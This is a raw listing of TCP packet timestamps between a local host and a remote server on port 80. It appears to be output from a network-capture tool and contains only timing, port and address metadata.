                                  Jul 26, 2024 23:14:29.500098944 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.500103951 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.500109911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.500118017 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.500129938 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.500138998 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.500148058 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.500185013 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.581528902 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.581754923 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.581784010 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.581804037 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.581813097 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.581829071 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.581837893 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.581852913 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.581871033 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.582118988 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582128048 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582143068 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582153082 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582165956 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.582173109 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582181931 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582196951 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.582201004 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582211018 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.582217932 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.582243919 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.583075047 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583084106 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583100080 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583111048 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583121061 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.583132029 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583141088 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583148956 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583153009 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583156109 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.583167076 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.583167076 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.583195925 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587152958 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587167978 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587186098 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587215900 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587238073 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587292910 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587307930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587316990 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587333918 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587342978 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587351084 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587361097 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587371111 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587383032 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587390900 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587399960 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587408066 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587418079 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587429047 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587436914 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587445021 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587459087 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587467909 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587472916 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587495089 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587531090 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587663889 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587675095 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587693930 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587702990 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587728024 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587752104 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587758064 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587769985 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587778091 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587795019 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587805986 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.587812901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.587830067 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.588416100 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588427067 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588439941 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588453054 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588464022 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.588469982 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588486910 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588498116 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.588522911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588531971 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.588541985 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588562965 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588572025 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.588623047 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.588828087 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.589813948 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.589823961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.589867115 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.589977980 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.589988947 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.589999914 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590013027 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590020895 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590029001 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590033054 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590043068 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590050936 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590091944 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590109110 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590797901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590806961 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590825081 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590833902 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590841055 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590852022 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590861082 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590867996 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590878010 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590888977 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.590895891 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590918064 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.590945959 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591294050 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591301918 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591315031 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591327906 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.591337919 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591346025 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591352940 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.591388941 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.591451883 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591460943 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591479063 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591486931 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591495037 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.591506958 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591515064 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.591536045 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.591571093 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.592139959 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592281103 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592292070 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592303038 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592315912 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.592319965 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592330933 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592339039 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.592348099 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592356920 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592370033 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.592375994 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592385054 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592395067 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.592402935 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592410088 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.592417955 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.592453957 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.593641996 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.593652010 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.593667030 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.593689919 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.593805075 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.593813896 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.593831062 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.593839884 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.593847036 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.593892097 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.674366951 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.674623013 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.674632072 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.674696922 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.674705029 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.674715996 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.674731970 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.674737930 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.674751043 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.674768925 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.675265074 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675272942 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675288916 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675297976 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675323963 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.675359011 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.675775051 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675786018 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675796986 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675808907 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.675813913 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675822973 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675838947 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675844908 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.675856113 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.675878048 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.675901890 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.676577091 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676585913 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676601887 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676610947 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676624060 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.676630974 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676640987 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676647902 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.676660061 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676670074 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.676681995 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.676703930 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.677495003 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677504063 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677515984 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677532911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677541018 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677552938 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.677560091 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677567959 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677583933 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.677587986 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.677623034 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.677635908 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.678586960 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678596020 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678608894 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678626060 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678634882 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678641081 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.678652048 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678661108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678670883 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.678678989 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.678695917 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.678719997 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.679754972 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679764032 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679775000 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679790020 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679800034 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.679807901 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679816008 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679830074 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.679836035 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679845095 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679852962 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.679862976 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.679887056 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.680252075 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680263042 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680279016 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680294991 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.680304050 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680311918 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680325031 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.680332899 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680342913 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680357933 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.680365086 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.680403948 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.681340933 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681351900 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681364059 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681380033 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681385994 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.681396008 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681405067 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681413889 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.681425095 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681435108 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.681446075 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.681469917 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.682112932 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.682123899 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.682135105 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.682147026 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.682154894 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.682163954 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.682177067 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.682183981 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.682193041 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.682209015 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.682229996 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.683182955 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683192015 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683203936 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683219910 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683228016 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683243990 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.683248997 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683258057 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683274984 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683279991 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.683296919 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.683324099 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.683964968 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683974028 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683990002 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.683999062 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684012890 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684019089 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.684029102 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684039116 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.684046030 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684056044 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684067965 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684081078 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.684106112 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.684921980 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684930086 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684947968 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684958935 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684964895 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.684971094 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684988022 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.684994936 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.685003996 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.685029030 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.685050964 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.685772896 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.685785055 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.685796022 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.685807943 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.685817957 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.685843945 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.686218977 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.686228037 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.686240911 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.686256886 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.686265945 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.686278105 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.686286926 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.686295033 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.686307907 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.686341047 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.763709068 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.763722897 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.763729095 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.763956070 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.764265060 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764280081 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764307976 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764314890 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.764328003 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764338017 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764352083 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.764358044 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764368057 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764385939 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764390945 CEST4974180192.168.2.451.77.140.74
                                  Jul 26, 2024 23:14:29.764398098 CEST804974151.77.140.74192.168.2.4
                                  Jul 26, 2024 23:14:29.764405966 CEST4974180192.168.2.451.77.140.74
